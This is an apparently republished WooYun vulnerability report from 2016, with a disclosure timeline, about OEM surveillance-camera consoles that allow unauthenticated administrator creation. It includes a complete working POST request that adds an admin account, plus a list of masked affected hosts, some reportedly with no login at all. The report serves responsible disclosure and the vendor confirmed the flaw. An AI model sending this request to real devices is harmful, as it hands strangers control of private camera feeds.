某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

2017年5月3日19:01:51评论339 views字数 251阅读0分50秒阅读模式

摘要

2016-03-10：细节已通知厂商并且等待厂商处理中
2016-03-14：厂商已经确认，细节仅向厂商公开
2016-03-17：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-05-08：细节向核心白帽子及相关领域专家公开
2016-05-18：细节向普通白帽子公开
2016-05-28：细节向实习白帽子公开
2016-06-12：细节向公众公开

漏洞概要关注数(21) 关注此漏洞

缺陷编号： WooYun-2016-182770

漏洞标题：某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

漏洞作者：路人甲

提交时间： 2016-03-10 12:20

公开时间： 2016-06-12 16:00

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：设计缺陷/边界绕过逻辑错误

8人收藏

漏洞详情

披露状态：

简要描述：

涉及多家厂商

详细说明：

涉及如下公司

大华e眼

华迈千里眼

鼎世千里眼

合作，还些案例没LOGO(具体型号请登录案例测试)

code 区域

翼安居.天翼卫士
 翼安居 翼安铺
 天翼慧眼
 189look视频看家

漏洞证明：

根据互联网案例测试发现部分产品未开启登录功能(可直接进入监控控制台)，而部分产品开启了登录功能可利用post包直接添加任意管理员（无需登录，全局功能未授权访问导致）。

code 区域

POST /cn/base/cgi-bin/login.cgi?save HTTP/1.1
 Host: 地址
 Content-Length: 249
 Accept: application/json, text/javascript, */*; q=0.01
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: keyenable=; login_level=0
 Connection: close
 
 keyenable=1&username=admin&password=wooyun&group=0&name1=&pwd1=&group1=2&name2=&pwd2=&group2=2&name3=&pwd3=&group3=2&name4=&pwd4=&group4=2&name5=&pwd5=&group5=2&name6=&pwd6=&group6=2&name7=&pwd7=&group7=2&name8=&pwd8=&group8=2&name9=&pwd9=&group9=2

案例：

code 区域

以下案例需登录验证（可利用post包直接添加管理员）：
 **.**.**.**/cn/
 **.**.**.**/en/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**:83/cn/
 **.**.**.**:82/cn/
 **.**.**.**:82/cn/
 **.**.**.**/cn/
 **.**.**.**:82/cn/
 **.**.**.**:81/cn/
 **.**.**.**:81/cn/
 **.**.**.**:81/cn/
 **.**.**.**/cn/
 **.**.**.**:82/cn/
 **.**.**.**:82/cn/
 **.**.**.**:81/cn/
 **.**.**.**:100/cn/
 **.**.**.**:8081/cn/
 **.**.**.**:81/cn/
 以下案例未开启登录验证功能直接可进控制台：
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**/cn/
 **.**.**.**:100/cn/     华迈千里眼see1000 
 **.**.**.**:81/cn/
 **.**.**.**:89/cn/
 **.**.**.**:81/cn/
 **.**.**.**:88/cn/
 **.**.**.**:81/cn/
 **.**.**.**/cn/
 **.**.**.**:81/cn/
 **.**.**.**/cn/
 **.**.**.**:100/cn/
 **.**.**.**:100/cn/
 **.**.**.**:81/cn/    大华e眼 远程视频监控系统运营服务平台
 **.**.**.**/cn/     翼安居.天翼卫士
 **.**.**.**/cn/    翼安居 翼安铺
 **.**.**.**/cn/
 **.**.**.**:8090/cn/
 **.**.**.**:82/cn/
 **.**.**.**/cn/     鼎世千里眼
 **.**.**.**:85/cn/
 **.**.**.**:81/cn/         189look视频看家
 **.**.**.**/cn/
 **.**.**.**:81/cn/
 **.**.**.**:84/cn/
 **.**.**.**/cn/           天翼慧眼
 **.**.**.**/cn/
 **.**.**.**:81/cn/
 **.**.**.**:8081/cn/
 **.**.**.**/cn/
 **.**.**.**:81/cn/
 **.**.**.**/cn/
 **.**.**.**:100/cn/
 **.**.**.**:100/cn/
 **.**.**.**:85/cn/

修复方案：

联系厂商

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2016-03-14 15:57

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过软件生产厂商公开联系渠道向其邮件通报，由其后续提供解决方案并协调相关用户单位处置。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(21) 关注此漏洞

缺陷编号： WooYun-2016-182770

漏洞标题： 某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

相关厂商： 某OEM安防监控

漏洞作者： 路人甲

提交时间： 2016-03-10 12:20

公开时间： 2016-06-12 16:00

漏洞类型： 设计缺陷/逻辑错误

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 设计缺陷/边界绕过 逻辑错误

8人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(21) 关注此漏洞

漏洞标题：某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

相关厂商：某OEM安防监控

漏洞作者：路人甲

漏洞类型：设计缺陷/逻辑错误

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：设计缺陷/边界绕过逻辑错误

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分